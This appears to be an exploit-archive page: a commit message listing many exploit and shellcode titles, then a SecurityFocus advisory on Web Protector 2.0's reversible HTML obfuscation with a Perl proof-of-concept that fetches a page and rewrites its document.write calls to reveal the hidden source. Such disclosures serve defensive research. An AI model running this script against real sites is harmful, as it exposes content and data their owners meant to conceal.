
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
64 lines
No EOL
2.6 KiB
Perl
Executable file
64 lines
No EOL
2.6 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/7409/info
|
|
|
|
Web protector has been reported prone to a trivial encryption weakness.
|
|
|
|
It has been reported that the method used to obfuscate and protect the HTML source of web pages implementing Web Protector is flawed and may be easily reversed.
|
|
|
|
This weakness may be exploited to disclose sensitive information contained in HMTL source or to reveal the HTML source itself. Due to the nature of web based obfuscation Sensitive information should never be included in the source of an obfuscated document.
|
|
|
|
Administrators may be relying on a false sense of security by implementing the protection supplied by Web protector.
|
|
|
|
It should be noted that although this weakness has been reported to affect Web Protector version 2.0, previous versions are most likely also affected.
|
|
|
|
use URI::Escape;
|
|
require HTTP::Request;
|
|
use LWP::UserAgent;
|
|
|
|
|
|
# Define the page we want to see the HTML source
|
|
$html_page = "http://www.protecthtml.com/product/wp/sample21.htm";
|
|
|
|
$ua = LWP::UserAgent->new;
|
|
$request = HTTP::Request->new(GET => $html_page );
|
|
$response = $ua->request($request);
|
|
if ($response->is_success) {
|
|
$encrypted_html =$response->content;
|
|
} else {
|
|
print $response->error_as_HTML;
|
|
exit(0);
|
|
}
|
|
|
|
# Some try to overwrite document.write by doing something like
|
|
# document.write = null;
|
|
# so we're going to search the source code for any document.write=
|
|
# or its escaped version which is:
|
|
# %64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%3D
|
|
$encrypted_html =~ s/document.write[ ]*=(.*)\;/void_var=$1/i;
|
|
|
|
# -- this is all on the same line --
|
|
$encrypted_html =~
|
|
s/%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65(%20)*(%3D)(.*)
|
|
\;/void_var=$3/i;
|
|
|
|
# All scripts have to use a document.write to write the decrypted HTML
|
|
# to the browser window so all we're going to do is add a <PLAINTEXT>
|
|
# tag to make sure that the derypted html is not decoded by the browser
|
|
# and instead we see the source code!
|
|
# -- this is all on the same line --
|
|
$encrypted_html =~ s/document.write[
|
|
]*\((.*?)
|
|
\)/document.write\(\\\"<PLAINTEXT>\\\"+$1+\\\"<\/PLAINTEXT>\\\"\)/gi;
|
|
|
|
# -- this is all on the same line --
|
|
$encrypted_html =~
|
|
s/%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65(%20)*%28(.*?)%
|
|
29/document.write\(\\\"<PLAINTEXT>\\\"+$2+\\\"<\/PLAINTEXT>\\\"\)/gi;
|
|
|
|
open(OUT,">clear_text.html");
|
|
print OUT $encrypted_html;
|
|
|
|
# Some LAME tools don't even try to encrypt the pages they just URL encode
|
|
everything
|
|
print OUT "<p> Let us try just to Unescape the source! <PLAINTEXT>";
|
|
print OUT uri_unescape($response->content);
|
|
close(OUT); |